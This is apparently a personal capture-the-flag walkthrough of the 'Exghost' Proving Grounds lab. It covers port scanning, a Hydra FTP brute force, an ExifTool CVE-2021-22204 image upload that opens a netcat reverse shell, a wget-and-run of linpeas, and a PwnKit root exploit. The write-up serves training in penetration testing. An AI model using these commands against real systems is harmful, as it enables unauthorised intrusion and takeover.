# Exghost

## Intro

This is my first walkthrough posted on this site. While this box was labeled as 'Easy' by OffSec, I ran into several challenges along the way. As a result, I resorted to peeking at two walkthroughs at several times during the assessment. Shoutout to the following two walkthroughs for pointing me in the right direction: 

* [Exghost Walkthrough by Vivek Kumar](https://medium.com/@vivek-kumar/offensive-security-proving-grounds-walk-through-exghost-2e9a969ef711)
* [Exghost Walkthrough by Jose Serno](https://medium.com/@jserna4510/exghost-pg-walkthrough-1d20b3011b2f)

## Initial Foothold

I began by running an nmap scan to identify open ports:

{% code fullWidth="false" %}

```
# Nmap 7.94 scan initiated Fri Dec  1 10:19:25 2023 as: nmap -sC -sV -oA nmap/initial -vv exghost.pg
Nmap scan report for exghost.pg (192.168.162.183)
Host is up, received echo-reply ttl 61 (0.041s latency).
Scanned at 2023-12-01 10:19:25 CST for 16s
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE  SERVICE  REASON         VERSION
20/tcp closed ftp-data reset ttl 61
21/tcp open   ftp      syn-ack ttl 61 vsftpd 3.0.3
80/tcp open   http     syn-ack ttl 61 Apache httpd 2.4.41
|_http-title: 403 Forbidden
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: 127.0.0.1; OS: Unix
```

{% endcode %}

I also ran a full TCP and UDP port scan, but these did not yield any additional results. 

VSFTPD 3.0.3 and Apache 2.4.41 were found to be running on the host. This version of VSFTPD is vulnerable to Denial-of-Service, which did not seem useful for this lab. While this version of Apache has two CVEs assigned to it which result in code execution, the exploit requires a non-default configuration, and this instance was not found to be vulnerable to the exploit: 

<figure><img src="https://2198412308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTlGdjVUx1Zp0BuO3GLEj%2Fuploads%2FfhhYwt8oJtSsRpVmbDEO%2F2023-12-02%2009_59_26-Kali%202023.3%20%5BRunning%5D%20-%20Oracle%20VM%20VirtualBox.png?alt=media&#x26;token=307c606c-d2fb-48b4-945e-b0860407664e" alt=""><figcaption></figcaption></figure>

I enumerated HTTP using Gobuster and found that most results were giving HTTP 403 'Forbidden' response codes, indicating that I was not authorized to view the pages. However, this did indicate the existence of an `uploads` directory:&#x20;

```
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://exghost.pg
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/joe/Downloads/raft-small-words.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              phtml,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 275]
/.html.phtml          (Status: 403) [Size: 275]
/.html.php            (Status: 403) [Size: 275]
/.html                (Status: 403) [Size: 275]
/.htm.php             (Status: 403) [Size: 275]
/.htm                 (Status: 403) [Size: 275]
/.htm.phtml           (Status: 403) [Size: 275]
/uploads              (Status: 301) [Size: 310] [--> http://exghost.pg/uploads/]
/.                    (Status: 403) [Size: 275]
/.htaccess.php        (Status: 403) [Size: 275]
/.htaccess.phtml      (Status: 403) [Size: 275]
/.htaccess            (Status: 403) [Size: 275]
/.phtml               (Status: 403) [Size: 275]
/.htc.php             (Status: 403) [Size: 275]
/.htc                 (Status: 403) [Size: 275]
/.htc.phtml           (Status: 403) [Size: 275]
/.html_var_DE.php     (Status: 403) [Size: 275]
/.html_var_DE         (Status: 403) [Size: 275]
/.html_var_DE.phtml   (Status: 403) [Size: 275]
/server-status        (Status: 403) [Size: 275]
/.htpasswd            (Status: 403) [Size: 275]
/.htpasswd.php        (Status: 403) [Size: 275]
/.htpasswd.phtml      (Status: 403) [Size: 275]
/.html.               (Status: 403) [Size: 275]
/.html..phtml         (Status: 403) [Size: 275]
/.html..php           (Status: 403) [Size: 275]
/.html.html           (Status: 403) [Size: 275]
/.html.html.phtml     (Status: 403) [Size: 275]
/.html.html.php       (Status: 403) [Size: 275]
/.htpasswds           (Status: 403) [Size: 275]
/.htpasswds.phtml     (Status: 403) [Size: 275]
/.htpasswds.php       (Status: 403) [Size: 275]
/.htm.                (Status: 403) [Size: 275]
/.htm..phtml          (Status: 403) [Size: 275]
/.htm..php            (Status: 403) [Size: 275]
/.htmll               (Status: 403) [Size: 275]
/.htmll.phtml         (Status: 403) [Size: 275]
/.htmll.php           (Status: 403) [Size: 275]
/.phps                (Status: 403) [Size: 275]
/.html.old            (Status: 403) [Size: 275]
/.html.old.php        (Status: 403) [Size: 275]
/.html.old.phtml      (Status: 403) [Size: 275]
/.ht                  (Status: 403) [Size: 275]
/.ht.phtml            (Status: 403) [Size: 275]
/.html.bak.php        (Status: 403) [Size: 275]
/.ht.php              (Status: 403) [Size: 275]
/.html.bak            (Status: 403) [Size: 275]
/.html.bak.phtml      (Status: 403) [Size: 275]
/.htm.htm             (Status: 403) [Size: 275]
/.htm.htm.phtml       (Status: 403) [Size: 275]
/.htm.htm.php         (Status: 403) [Size: 275]
/.htgroup.php         (Status: 403) [Size: 275]
/.hta.php             (Status: 403) [Size: 275]
/.htgroup             (Status: 403) [Size: 275]
/.hta                 (Status: 403) [Size: 275]
/.html1               (Status: 403) [Size: 275]
/.hta.phtml           (Status: 403) [Size: 275]
/.html1.php           (Status: 403) [Size: 275]
/.html1.phtml         (Status: 403) [Size: 275]
/.htgroup.phtml       (Status: 403) [Size: 275]
/.html.LCK.php        (Status: 403) [Size: 275]
/.html.LCK            (Status: 403) [Size: 275]
/.html.LCK.phtml      (Status: 403) [Size: 275]
/.html.printable      (Status: 403) [Size: 275]
/.html.printable.phtml (Status: 403) [Size: 275]
/.html.printable.php  (Status: 403) [Size: 275]
/.htm.LCK             (Status: 403) [Size: 275]
/.htm.LCK.phtml       (Status: 403) [Size: 275]
/.htm.LCK.php         (Status: 403) [Size: 275]
/.htaccess.bak        (Status: 403) [Size: 275]
/.htaccess.bak.php    (Status: 403) [Size: 275]
/.htaccess.bak.phtml  (Status: 403) [Size: 275]
/.html.php            (Status: 403) [Size: 275]
/.html.php.php        (Status: 403) [Size: 275]
/.html.php.phtml      (Status: 403) [Size: 275]
/.htmls               (Status: 403) [Size: 275]
/.htmls.php           (Status: 403) [Size: 275]
/.htmls.phtml         (Status: 403) [Size: 275]
/.htx                 (Status: 403) [Size: 275]
/.htx.php             (Status: 403) [Size: 275]
/.htx.phtml           (Status: 403) [Size: 275]
/.htlm                (Status: 403) [Size: 275]
/.htlm.phtml          (Status: 403) [Size: 275]
/.htm2                (Status: 403) [Size: 275]
/.htlm.php            (Status: 403) [Size: 275]
/.htm2.php            (Status: 403) [Size: 275]
/.htm2.phtml          (Status: 403) [Size: 275]
/.html-               (Status: 403) [Size: 275]
/.html-.php           (Status: 403) [Size: 275]
/.html-.phtml         (Status: 403) [Size: 275]
/.htuser.php          (Status: 403) [Size: 275]
/.htuser.phtml        (Status: 403) [Size: 275]
/.htuser              (Status: 403) [Size: 275]

===============================================================
Finished
===============================================================
```

I repeated my Gobuster scan on the `uploads` directory, but did not have any results without the HTTP 403 response code.&#x20;

Turning my attention to the FTP service, I noticed that anonymous login was not allowed. While a previous version of VSFTPD was known to have default credentials, those credentials were not valid for this instance. In previous boxes I have worked through, if brute forcing is required, enumeration typically reveals a username that can be used. However, in this case, brute forcing of both the username and password combination were required:&#x20;

```shell-session
┌──(joe㉿kali)-[~]
└─$ hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://exghost.pg
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-12-02 10:17:32
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://exghost.pg:21/
[21][ftp] host: exghost.pg   login: user   password: system
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-12-02 10:17:48
```

I was then able to connect to the FTP service and download a file named `backup`:

```
┌──(joe㉿kali)-[~]
└─$ ftp user@exghost.pg       
Connected to exghost.pg.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||12485|)
^C
receive aborted. Waiting for remote to finish abort.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0          126151 Jan 27  2022 backup
226 Directory send OK.
ftp> get backup
local: backup remote: backup
200 EPRT command successful. Consider using EPSV.
150 Opening BINARY mode data connection for backup (126151 bytes).
100% |******************************************************************|   123 KiB  805.28 KiB/s    00:00 ETA
226 Transfer complete.
126151 bytes received in 00:00 (604.46 KiB/s)
```

Reviewing the `backup` file, it was found to be a packet capture. Within this packet capture was a POST request to `/exiftest.php` uploading a file as form data:&#x20;

<figure><img src="https://2198412308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTlGdjVUx1Zp0BuO3GLEj%2Fuploads%2Fvh0uWnEaMPauJLHGCQ1t%2F2023-12-02%2010_28_30-Kali%202023.3%20%5BRunning%5D%20-%20Oracle%20VM%20VirtualBox.png?alt=media&#x26;token=833fcef5-1cc9-4908-a752-178b3f6c1de1" alt=""><figcaption></figcaption></figure>

Additionally, the response to this POST request indicated that version 12.23 of ExifTool was in use:&#x20;

<figure><img src="https://2198412308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTlGdjVUx1Zp0BuO3GLEj%2Fuploads%2FF51hC0fjYfuYwMKbIOFE%2F2023-12-02%2010_27_03-Kali%202023.3%20%5BRunning%5D%20-%20Oracle%20VM%20VirtualBox.png?alt=media&#x26;token=d32cbf15-dd2d-4c16-ae3b-e0fb403d0856" alt=""><figcaption></figcaption></figure>

This version of ExifTool was vulnerable to CVE-2021-22204, which allows for arbitrary code execution when parsing a malicious image that uses the DjVu file format. I found an [exploit on Exploit-DB](https://www.exploit-db.com/exploits/50911) which can create an image that will create a reverse shell connection when parsed:&#x20;

<figure><img src="https://2198412308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTlGdjVUx1Zp0BuO3GLEj%2Fuploads%2FMwrfUneP8rjfhYyWdilV%2F2023-12-02%2010_41_59-Kali%202023.3%20%5BRunning%5D%20-%20Oracle%20VM%20VirtualBox.png?alt=media&#x26;token=ddbab50f-dd67-40d9-9867-a1b65ebab4a8" alt=""><figcaption></figcaption></figure>

I started a netcat listener on port 9001, and was then able to use the following curl command to submit the malicious image as form data in a POST request:&#x20;

```
┌──(joe㉿kali)-[~/hax/pg/exghost]
└─$ curl -F myFile=@image.jpg http://exghost.pg/exiftest.php
```

After submitting the image, I caught a reverse shell on my netcat listener:&#x20;

```
┌──(joe㉿kali)-[~/hax/pg/exghost]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.245] from (UNKNOWN) [192.168.193.183] 48540
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ pwd
/var/www/html
```

## Privilege Escalation

After gaining an initial foothold as the `www-data` user, I moved into the `/tmp` directory to run linpeas:&#x20;

```
$ cd /tmp
$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
$ sh linpeas.sh | tee linpeas-output.txt
```

The linpeas output revealed that this host is vulnerable to CVE-2021-4034:&#x20;

<figure><img src="https://2198412308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTlGdjVUx1Zp0BuO3GLEj%2Fuploads%2F4Q1nyBpgniKUAxWA7uX0%2F2023-12-02%2010_56_57-Kali%202023.3%20%5BRunning%5D%20-%20Oracle%20VM%20VirtualBox.png?alt=media&#x26;token=cd445ccb-ea91-463b-8db8-918337c8a9a5" alt=""><figcaption></figcaption></figure>

However, there was not a C compiler installed on the host. Before I attempted to compile an exploit off-box, I looked for alternatives and found an [exploit written in python3](https://github.com/joeammond/CVE-2021-4034). Executing this exploit resulted in `root` access!&#x20;

<figure><img src="https://2198412308-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTlGdjVUx1Zp0BuO3GLEj%2Fuploads%2FGMW2CDfalpIdCwPTWKed%2F2023-12-02%2011_04_50-Kali%202023.3%20%5BRunning%5D%20-%20Oracle%20VM%20VirtualBox.png?alt=media&#x26;token=970970f1-c5ee-4cb9-b782-fed07528b892" alt=""><figcaption></figcaption></figure>